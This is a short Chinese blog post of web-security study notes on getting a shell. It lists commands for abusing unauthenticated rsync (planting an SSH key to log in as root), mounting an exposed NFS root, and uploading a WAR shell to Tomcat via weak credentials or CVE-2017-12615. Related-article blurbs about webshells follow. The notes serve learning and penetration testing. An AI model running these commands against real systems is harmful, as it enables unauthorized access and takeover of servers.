【学习笔记】利用web漏洞来getshell

最新推荐文章于 2023-04-06 22:19:03 发布
最新推荐文章于 2023-04-06 22:19:03 发布
阅读量387 收藏
点赞数
分类专栏: web安全学习笔记 文章标签: shell nfs tomcat rsync nmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chualam/article/details/109349723
版权

nmap命令扫码
nmap ip -p端口 -sP -sV --version-all
rsync未授权访问(端口873)
rsync (--port=端口) ip:: //看看有什么文件
rsync (--port=端口) ip::file  //进入文件
rsync (--port=端口) ip::file/.exe /下载本地目录 下载到本地
rsync (--port=端口) 本地文件地址 ip::file //上传文件,这时上传ssh公钥 
ssh root@ip 进行链接
rm 文件地址 //删除公钥的文件夹
logout //退出

nfs攻击(端口2049)

showmount -e ip //查看nfs存放目录
mkdir 目录地址 //新建本地目录
mount -t nfs ip:/ /本地目录/  //把对方根目录映射到本地目录


tomcat上传shell.war
弱口令进入manger页面 上传
还存在CVE-2017-12615漏洞
curl和burp均可上传.jsp文件攻击

снυαιαм ιее
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【Windows】基于curl命令的Shell上线姿势--解决shiro命令执行工具命令回显拉胯的问题
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-07 1118
基于curl命令的Shell上线姿势--解决shiro命令执行漏洞命令回显拉胯的问题
Linux下在shell中使用curl模拟get,post请求访问接口并设置代理
ithover的博客
05-13 9553
在服用端做测试或查找问题的时候,难免要测试接口,测试接口最简单的方法就是利用shell的curl命令来模板get,post请求,每次都用,但是有些参数时间一长就记不清楚了,所以记录一下以备忘 curl 介绍 curl 命令,是一个利用URL规则在命令行下工作的文件传输工具。 curl 支持文件的上传和下载,所以是综合传输工具,但按传统,习惯称curl为下载工具。 作为一款强力工具,curl支持包括HTTP、HTTPS、FTP等众多协议,还支持 GET、POST、cookies、认证、从指定偏移处下载部分文件
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3684
网站Getshell的方法
Web安全基础-命令执行getshell
HAKUNAMATATATTA的博客
11-23 1153
应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行。
PHP文件包含漏洞代码分析-通过漏洞getshell-学习笔记
最新发布
ZhangAweio的博客
04-06 705
假设我们有一个网站有上传漏洞,但我们并不能进行直接getshell,这时候我们就用到这漏洞来进行getshell假如我们有个网站已经成功上传shell 了,但是无法运行,因为是其他格式的那么我们可以通过文件包含漏洞来进行getshell首先写入一句话木马成功访问不是PHP结尾的文件,文件包含漏洞危害及其大,如有被利用不堪设想。
安全:Web安全学习笔记
02-26
这个月看了一本《Web安全设计之道》,书中的内容多是从微软官方文档翻译而来,这本书的含金量不高,不过也不能说没有收获,本文简单记录一下我学习Web安全方面的笔记。本文不涉及IIS、Windows和SqlServer的安全管理...
shell学习笔记
01-20
echo echo [选项] [输出内容] 选项: -e: 支持反斜线控制的字符转换 \\ 输出\本身 \a 输出警告音 \b 退格键,也就是向左删除键 ...shell脚本开头 脚本的执行 1 首先要赋予脚本x权限,输入脚本的绝对路径
shell脚本学习笔记–基础(1)
01-09
shell脚本学习笔记–基础(1)简介脚本注释脚本解释器脚本执行脚本调试基本符号和命令含义 简介 学习Shell脚本之前,我们有必要先来认识认识什么叫Shell?谈到这个问题,我们首先来回忆一下计算机自底向上的体系,最...
Rsync未授权访问 getshell——漏洞复现
W小哥
11-09 3676
一、 Rsync未授权访问漏洞介绍 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。 二、靶场搭建 靶机: ubuntu IP: 192.168.241.142 攻击机: kali IP: 192.168.241.128 直接使用 vluhub 环境了 cd rsync/common docker-compose build docke
phpweb通用上传漏洞
05-16
phpweb通用上传漏洞 一键GETshell 不用多解释了
利用文件包含漏洞-getshell
LJH1999ZN的博客
02-22 7317
一、什么是文件包含漏洞 文件包含是指应用程序没有对引用的文件做合理的校验,导致包含的文件中含有恶意的代码,并且执行了该代码。从而产生了文件包含漏洞 二、文件包含漏洞利用条件 1.引用一个任意类型的文件 2.程序读取文件并且执行 三、将木马程序放入某个本地文件中。 1.利用网站报错日志写入木马程序 2.利用文件上传功能,上传含有木马的任意文件 四、文件包含getshell 1.本地文件包含getshell 网站会将一些错误信息记录到日志文件中,我们可以利用这个特性将木马写入日志文件中去
Bugku:web 求getshell
qq_26961571的博客
09-09 995
打开这道题,getshell表示的是get shellshell则为脚本的意思。 ​ 打开链接。 发现是一个网页可以上传文件,那么就是文件上传漏洞。 源代码也是不出所料的没有任何东西。 看来是真的要上传一个文件了,试了一下上传一个jpg格式文件,成功!!不过没有用啊,什么东西都没有显示出来。 查了一下资料: webshell就是以php、jsp等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或...
从命令执行到GetShell,适合新手学习
kali_Ma的博客
08-29 1231
最近做项目遇到一个比较典型命令执行漏洞,适合新手学习,给大家分享下整个过程。 从代码中可以看出来程序只使用trim()方法对jdk进行了两遍的空格过滤,然后直接和后面拼接的命令一起执行。 接着来找一下这个方法的调用链, 可以看到这里依次调用了3个命令执行的方法,如果命令都能成功执行的话,可以执行3次。 然后找一下这个jdk参数是否是我们可控的, 上面的代码显示jdk这个参数是从请求中获取的,看到这里已经能确定是个命令执行漏洞了,下面我们来利用这个漏洞。 执行了ls&&结果报错,看显示
记一次FastAdmin后台Getshell
qq_45244158的博客
06-28 5089
FastAdmin 是基于ThinkPHP5和Bootstrap的极速后台开发框架。 基于ThinkPHP行为功能实现的插件机制,拥有丰富的插件和扩展,可直接在线安装卸载 。 基于完善的Auth权限控制管理、无限父子级权限分组、可自由分配子级权限、一个管理员可同时属于多个组别 。在某次HVV的打点过程中,发现某资产为FastAdmin搭建。 下图为FastAdmin的报错页面,根据经验可判断该网站为FastAdmin搭建。 输入admin.php进入后台登录页面,弱口令进入后台。 进入后台找功能点get
常用的30+种未授权访问漏洞汇总
weixin_52501704的博客
08-11 8841
未授权访问漏洞汇总预览 1 、FTP 未授权访问(21) 2 、LDAP 未授权访问(389) 3 、Rsync 未授权访问(873) 4 、ZooKeeper 未授权访问(2181) 5 、Docker 未授权访问(2375) 6 、Docker Registry未授权(5000) 7 、Kibana 未授权访问(5601) 8 、VNC 未授权访问(5900、5901) 9 、CouchDB 未授权访问(5984) 15 10 、Apache Spark 未授权访问(6066、8.
GetShell的姿势总结
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
03-20 4124
0x00 什么是WebShell 渗透测试工作的一个阶段性目标就是获取目标服务器的操作控制权限,于是WebShell便应运而生。Webshell中的WEB就是web服务,shell就是管理攻击者与操作系统之间的交互。Webshell被称为攻击者通过Web服务器端口对Web服务器有一定的操作权限,而webshell常以网页脚本的形式出现。常见的WebShell使用asp、jsp和php来编写,提供了如执行系统命令、文件上传下载、数据库管理等功能。 0x01 获取WebShell的方式 获取W...
Java Web前端学习笔记:HTML到AJAX基础
"这篇文档包含了作者在学习Java Web前端时的笔记,主要涵盖了前端开发的基础知识,包括HTML、CSS、JavaScript、DOM编程、jQuery框架以及AJAX基础。" 本文档详细介绍了Java Web前端开发中的核心技术和元素,首先从...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值